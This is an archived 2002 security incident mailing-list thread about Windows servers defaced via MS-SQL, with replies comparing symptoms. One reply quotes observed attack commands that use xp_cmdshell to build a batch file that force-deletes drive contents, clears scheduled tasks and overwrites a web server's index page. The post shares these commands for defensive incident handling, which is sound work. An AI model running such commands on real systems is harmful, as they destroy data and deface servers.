RE: Windows Systems Defaced

From: Brenna Primrose (drxlecterat_private)
Date: Fri May 03 2002 - 10:17:47 PDT


    I saw SQL probes today on several of our systems from wanadoo.fr --
    coincidence?  I think not.  Wanadoo.fr is infamous for looking for FTP
    servers to crack.  Hmmm...
    
    
    AIM - abosolut x psycho
    Yahoo! - absolut_contagion
    ICQ - 1363187
    http://gsa.creighton.edu
    http://profiles.yahoo.com/absolut_contagion
    -----BEGIN GEEK CODE BLOCK-----
    Version: 3.12
    GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ 
    O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ 
    G e* h- r++ x+ 
    ------END GEEK CODE BLOCK------
    
    -----Original Message-----
    From: Steve Zenone [mailto:zenoneat_private] 
    Sent: Thursday, May 02, 2002 10:24 PM
    To: incidentsat_private
    Cc: thompsonat_private
    Subject: RE: Windows Systems Defaced
    
    Hello,
    
    Stephen W. Thompson wrote:
    |> Have any of you seen similar activity? Any thoughts?
    |
    |Yes, we had one that matches most of your details.  These
    |are exact matches:
    |
    |>  [] Damage occurred around 1600 on 5/1/2002
    |BUT=>   (approx. 16:00 EDT for us)
    |>  [] Win-popup message with "F---ing University of Rochester"
    |>       -- NOTE: not all systems running IIS
    |>  [] Admins claimed that all systems were patched correctly
    |>  [] Most were running updated and current AV
    
    Thank you very much for your reply - it definitely helps!
    
    We have been seeing MS-SQL (1433/tcp) attacks that try and execute 
    the following: 
    
    -----BEGIN SNIPPET-----
        xp_cmdshell 'echo net send localhost F---ing University of Rochester rebooting... > rochester.bat'
        xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
        xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
        xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
        xp_cmdshell 'at /delete /y'
        xp_cmdshell 'echo if exist \inetpub\wwwroot\ type %systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >> rochester.bat'
    -----END SNIPPET-----
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    This archive was generated by hypermail 2b30 : Fri May 03 2002 - 11:42:50 PDT